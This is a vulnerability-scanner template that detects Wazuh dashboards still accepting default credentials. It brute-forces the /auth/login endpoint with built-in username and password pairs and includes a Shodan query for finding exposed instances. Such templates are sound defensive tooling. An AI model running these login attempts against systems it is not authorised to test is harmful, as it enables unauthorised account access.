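# Detection template: reports a Wazuh dashboard that still accepts one of the
# default credential pairs listed under `payloads`.
# NOTE(review): the trailing `# digest:` line is a signature over the template
# text, so it has to be regenerated after any edit to this file.
id: wazuh-default-login

info:
  name: Wazuh - Default Login
  author: theamanrawat,denandz,PulseSecurity.co.nz
  severity: high
  description: |
    Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  remediation: |
    Change the default passwords of the built-in Wazuh users; the password management guide listed under reference describes the procedure.
  reference:
    - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
    - https://wazuh.com
    - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
  metadata:
    verified: true
    # 1 GET + (2 usernames x 3 passwords) from the clusterbomb step below.
    max-request: 7
    shodan-query: "title:\"Wazuh\""
  tags: wazuh,default-login

http:
  # Step 1: read the dashboard version from the login page. The value is kept
  # internal (not reported) and only feeds the Osd-Version header in step 2.
  - method: GET
    path:
      - "{{BaseURL}}/app/login"

    extractors:
      - type: regex
        part: body
        name: osd
        group: 1
        internal: true
        regex:
          - '"version":"([0-9.]+)"'

  # Step 2: try each username/password combination against the login endpoint.
  # Header names carry no space before the colon, and the empty line separates
  # the headers from the JSON body; both are required for a well-formed request.
  # NOTE(review): osd-xsrf looks like the dashboard's XSRF header - confirm.
  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        Osd-Version: {{osd}}
        osd-xsrf: osd-fetch
        Content-Type: application/json

        {"username" : "{{username}}" , "password" : "{{password}}" }

    # clusterbomb pairs every username with every password (up to 6 POSTs per
    # target); account for that against any lockout threshold on the instance.
    # In access logs a run shows as one GET /app/login followed by a short
    # burst of POST /auth/login requests from the same client.
    attack: clusterbomb
    payloads:
      username:
        - "admin"
        - "wazuh"
      password:
        - "admin"
        - "wazuh"
        # presumably the password from the Docker single-node deployment guide
        # listed under reference - confirm
        - "SecretPassword"
    # Stop sending further combinations once one pair is accepted.
    stop-at-first-match: true

    # All three matchers must hold: a 200 JSON response whose body contains
    # both a username and a roles field, i.e. an authenticated session reply
    # rather than an error page that merely returns 200.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"roles":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'
        condition: and

      - type: status
        status:
          - 200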
# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950